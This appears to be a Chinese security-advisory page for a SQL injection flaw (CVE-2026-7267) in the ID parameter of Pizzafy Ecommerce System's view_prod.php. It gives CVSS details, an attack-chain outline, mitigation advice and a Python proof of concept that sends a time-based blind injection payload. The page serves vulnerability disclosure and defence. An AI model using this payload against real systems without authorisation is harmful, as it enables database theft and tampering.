CVE-2026-7267 CVSS 6.3 中危

CVE-2026-7267 SourceCodester Pizzafy SQL注入漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7267

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Pizzafy Ecommerce System

漏洞概述

SourceCodester Pizzafy Ecommerce System 1.0 版本中存在 SQL 注入漏洞。由于 /view_prod.php 文件对用户输入的 ID 参数缺乏有效过滤，导致远程攻击者可利用该漏洞执行恶意 SQL 语句。该漏洞利用难度低且无需用户交互，攻击者可能借此窃取数据库敏感信息或篡改数据。

技术细节

漏洞源于 SourceCodester Pizzafy Ecommerce System 1.0 中 `view_prod.php` 文件对 ID 参数的处理不当。应用程序直接将用户提交的 ID 参数值拼接到 SQL 查询语句中，未进行任何类型检查或转义，从而导致了经典的 SQL 注入漏洞。攻击者可以通过构造包含 SQL 元字符（如单引号、注释符）的 Payload，改变原始查询逻辑。根据 CVSS 3.1 评分向量，该漏洞攻击复杂度为低（AC:L），权限要求为低（PR:L），且无需用户交互（UI:N）。攻击者可以通过网络发起攻击，利用此漏洞读取数据库中的敏感数据（C:L），修改或删除数据（I:L），甚至在一定程度上影响系统可用性（A:L）。目前已有公开的利用代码发布。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标系统运行的是 SourceCodester Pizzafy Ecommerce System 1.0，并定位到存在漏洞的文件 /view_prod.php。

STEP 2

2. 构造Payload

攻击者针对 'ID' 参数构造恶意的 SQL 注入 Payload，例如 '1' UNION SELECT... 或时间盲注语句。

STEP 3

3. 发送恶意请求

攻击者向服务器发送包含恶意 Payload 的 HTTP GET 或 POST 请求。

STEP 4

4. 执行SQL语句

服务器后端未过滤参数，直接拼接执行 SQL 语句，导致数据库返回敏感信息或执行非预期命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-7267
# Target: SourceCodester Pizzafy Ecommerce System 1.0
# Endpoint: /view_prod.php
# Vulnerable Parameter: ID

import requests

def check_sqli(target_url):
    # Payload for time-based blind SQL injection
    # Checks if the database waits for 5 seconds
    payload = "1' AND SLEEP(5)-- -"
    
    params = {
        "ID": payload
    }
    
    try:
        print(f"[*] Sending request to {target_url}...")
        response = requests.get(target_url, params=params, timeout=10)
        
        # Check if response time indicates successful injection
        if response.elapsed.total_seconds() >= 5:
            print("[+] Vulnerability Confirmed: Time-based SQL Injection successful.")
            print(f"[+] Response time: {response.elapsed.total_seconds()} seconds")
        else:
            print("[-] Vulnerability not detected or patched.")
            print(f"[-] Response time: {response.elapsed.total_seconds()} seconds")
            
    except requests.exceptions.Timeout:
        print("[!] Request timed out, which might indicate a successful heavy payload.")
    except Exception as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target URL
    target = "http://localhost/pizzafy/view_prod.php"
    check_sqli(target)

影响范围

SourceCodester Pizzafy Ecommerce System 1.0

防御指南

临时缓解措施

在官方发布修复补丁之前，建议管理员通过 WAF 规则拦截针对 view_prod.php 的异常请求，或者临时禁用该页面的访问权限以防止漏洞被利用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7267
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7267
3 Details https://www.cvedetails.com/cve/CVE-2026-7267/
4 VulDB https://vuldb.com/cve/CVE-2026-7267
5 Link https://github.com/fernando-mengali/vulndb-submissions/blob/main/09-vul-SQLI.md
6 Link https://vuldb.com/submit/802441
7 Link https://vuldb.com/vuln/359918
8 Link https://vuldb.com/vuln/359918/cti
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表